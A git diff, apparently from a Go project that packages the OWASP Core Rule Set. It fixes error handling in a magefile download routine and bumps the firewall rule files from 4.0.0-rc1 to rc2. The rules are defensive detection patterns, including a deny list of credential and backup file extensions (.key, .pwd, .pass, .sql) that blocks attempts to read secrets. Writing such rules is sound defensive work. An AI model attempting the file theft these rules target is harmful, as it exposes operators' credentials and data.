diff --git a/magefile.go b/magefile.go
index 71ea425..4717bf6 100644
--- a/magefile.go
+++ b/magefile.go
@@ -11,12 +11,13 @@ import (
 	"bufio"
 	"bytes"
 	"fmt"
-	"github.com/magefile/mage/sh"
 	"io"
 	"net/http"
 	"os"
 	"path/filepath"
 	"strings"
+
+	"github.com/magefile/mage/sh"
 )
 
 func DownloadCRS() error {
@@ -35,6 +36,11 @@ func DownloadCRS() error {
 		return err
 	}
 	defer res.Body.Close()
+
+	if res.StatusCode != http.StatusOK {
+		return fmt.Errorf("unexpected status code: %d", res.StatusCode)
+	}
+
 	crsZip, err := io.ReadAll(res.Body)
 	if err != nil {
 		return err
@@ -102,7 +108,7 @@ func DownloadCRS() error {
 
 		source, err := f.Open()
 		if err != nil {
-			defer os.Remove(fPath)
+			os.Remove(fPath)
 			return err
 		}
 
diff --git a/rules/@crs-setup.conf.example b/rules/@crs-setup.conf.example
index ce993c8..049e94b 100644
--- a/rules/@crs-setup.conf.example
+++ b/rules/@crs-setup.conf.example
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
diff --git a/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf b/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf
index 1c42640..d0e6353 100644
--- a/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf
+++ b/rules/@owasp_crs/REQUEST-901-INITIALIZATION.conf
@@ -1,13 +1,13 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecComponentSignature "OWASP_CRS/4.0.0-rc1"
+SecComponentSignature "OWASP_CRS/4.0.0-rc2"
 SecRule &TX:crs_setup_version "@eq 0" \
     "id:901001,\
     phase:1,\
@@ -16,147 +16,147 @@ SecRule &TX:crs_setup_version "@eq 0" \
     log,\
     auditlog,\
     msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL'"
 SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
     "id:901100,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.inbound_anomaly_score_threshold=5'"
 SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
     "id:901110,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.outbound_anomaly_score_threshold=4'"
 SecRule &TX:reporting_level "@eq 0" \
     "id:901111,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.reporting_level=4'"
 SecRule &TX:early_blocking "@eq 0" \
     "id:901115,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.early_blocking=0'"
 SecRule &TX:blocking_paranoia_level "@eq 0" \
     "id:901120,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.blocking_paranoia_level=1'"
 SecRule &TX:detection_paranoia_level "@eq 0" \
     "id:901125,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
 SecRule &TX:sampling_percentage "@eq 0" \
     "id:901130,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.sampling_percentage=100'"
 SecRule &TX:critical_anomaly_score "@eq 0" \
     "id:901140,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.critical_anomaly_score=5'"
 SecRule &TX:error_anomaly_score "@eq 0" \
     "id:901141,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.error_anomaly_score=4'"
 SecRule &TX:warning_anomaly_score "@eq 0" \
     "id:901142,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.warning_anomaly_score=3'"
 SecRule &TX:notice_anomaly_score "@eq 0" \
     "id:901143,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.notice_anomaly_score=2'"
 SecRule &TX:allowed_methods "@eq 0" \
     "id:901160,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
 SecRule &TX:allowed_request_content_type "@eq 0" \
     "id:901162,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
 SecRule &TX:allowed_request_content_type_charset "@eq 0" \
     "id:901168,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'"
 SecRule &TX:allowed_http_versions "@eq 0" \
     "id:901163,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'"
 SecRule &TX:restricted_extensions "@eq 0" \
     "id:901164,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
 SecRule &TX:restricted_headers_basic "@eq 0" \
     "id:901165,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'"
 SecRule &TX:restricted_headers_extended "@eq 0" \
     "id:901171,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.restricted_headers_extended=/accept-charset/'"
 SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
     "id:901167,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.enforce_bodyproc_urlencoded=0'"
 SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
     "id:901169,\
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.crs_validate_utf8_encoding=0'"
 SecAction \
     "id:901200,\
@@ -164,7 +164,7 @@ SecAction \
     pass,\
     t:none,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'tx.blocking_inbound_anomaly_score=0',\
     setvar:'tx.detection_inbound_anomaly_score=0',\
     setvar:'tx.inbound_anomaly_score_pl1=0',\
@@ -191,7 +191,7 @@ SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     chain"
     SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \
         "t:none,t:sha1,t:hexEncode,\
@@ -205,7 +205,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
     noauditlog,\
     msg:'Enabling body inspection',\
     ctl:forceRequestBodyVariable=On,\
-    ver:'OWASP_CRS/4.0.0-rc1'"
+    ver:'OWASP_CRS/4.0.0-rc2'"
 SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
     "id:901350,\
     phase:1,\
@@ -214,7 +214,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
     nolog,\
     noauditlog,\
     msg:'Enabling forced body inspection for ASCII content',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     chain"
     SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
         "ctl:requestBodyProcessor=URLENCODED"
@@ -223,7 +223,7 @@ SecRule TX:sampling_percentage "@eq 100" \
     phase:1,\
     pass,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     skipAfter:END-SAMPLING"
 SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
     "id:901410,\
@@ -232,7 +232,7 @@ SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
     capture,\
     t:sha1,t:hexEncode,\
     nolog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"
 SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
     "id:901450,\
@@ -242,7 +242,7 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
     noauditlog,\
     msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
     ctl:ruleRemoveByTag=OWASP_CRS,\
-    ver:'OWASP_CRS/4.0.0-rc1'"
+    ver:'OWASP_CRS/4.0.0-rc2'"
 SecMarker "END-SAMPLING"
 SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \
     "id:901500,\
@@ -252,4 +252,4 @@ SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \
     t:none,\
     log,\
     msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
-    ver:'OWASP_CRS/4.0.0-rc1'"
+    ver:'OWASP_CRS/4.0.0-rc2'"
diff --git a/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf
index 03398c9..d880aa1 100644
--- a/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf
+++ b/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -17,7 +17,7 @@ SecRule REQUEST_LINE "@streq GET /" \
     tag:'language-multi',\
     tag:'platform-apache',\
     tag:'attack-generic',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     chain"
     SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
         "t:none,\
@@ -33,7 +33,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
     tag:'language-multi',\
     tag:'platform-apache',\
     tag:'attack-generic',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     chain"
     SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
         "t:none,\
diff --git a/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf
index 1f5257d..f7f0c9f 100644
--- a/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf
+++ b/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -23,7 +23,7 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272/220/274',\
     tag:'PCI/12.1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
diff --git a/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf b/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf
index 3f7646a..e6f003d 100644
--- a/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf
+++ b/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/224/541/310',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
diff --git a/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
index 142d15f..5b7c571 100644
--- a/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+++ b/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -23,7 +23,7 @@ SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?|(?
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegiln-or-suz]acut|[aeiou]grav|[ain-o]tild)e|[c-elnr-tz]caron|(?:[cgk-lnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\"';=])*$" \
@@ -40,7 +40,7 @@ SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegiln-or-suz]acut|[aeiou]grav|
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
@@ -57,7 +57,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
@@ -74,7 +74,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \
@@ -94,7 +94,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \
@@ -114,7 +114,7 @@ SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_METHOD "@streq POST" \
@@ -136,7 +136,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \
@@ -157,7 +157,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule TX:2 "@lt %{tx.1}" \
@@ -176,7 +176,7 @@ SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive|
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 SecRule REQUEST_URI "@rx \x25" \
@@ -193,7 +193,7 @@ SecRule REQUEST_URI "@rx \x25" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_URI "@validateUrlEncoding" \
@@ -212,7 +212,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_BODY "@rx \x25" \
@@ -233,7 +233,7 @@ SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/267',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     chain"
     SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \
@@ -253,7 +253,7 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx \%u[fF]{2}[0-9a-fA-F]{2}" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/267/72',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \
@@ -270,7 +270,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule &REQUEST_HEADERS:Host "@eq 0" \
@@ -287,7 +287,7 @@ SecRule &REQUEST_HEADERS:Host "@eq 0" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}',\
     skipAfter:END-HOST-CHECK"
@@ -304,7 +304,7 @@ SecRule REQUEST_HEADERS:Host "@rx ^$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 SecMarker "END-HOST-CHECK"
@@ -321,7 +321,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'NOTICE',\
     chain"
     SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
@@ -342,7 +342,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'NOTICE',\
     chain"
     SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \
@@ -363,7 +363,7 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'NOTICE',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'"
 SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
@@ -379,7 +379,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'NOTICE',\
     chain"
     SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
@@ -400,7 +400,7 @@ SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
     tag:'PCI/6.5.10',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
 SecRule &TX:MAX_NUM_ARGS "@eq 1" \
@@ -417,7 +417,7 @@ SecRule &TX:MAX_NUM_ARGS "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule &ARGS "@gt %{tx.max_num_args}" \
@@ -437,7 +437,7 @@ SecRule &TX:ARG_NAME_LENGTH "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \
@@ -457,7 +457,7 @@ SecRule &TX:ARG_LENGTH "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS "@gt %{tx.arg_length}" \
@@ -477,7 +477,7 @@ SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \
@@ -496,7 +496,7 @@ SecRule &TX:MAX_FILE_SIZE "@eq 1" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/210/272',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
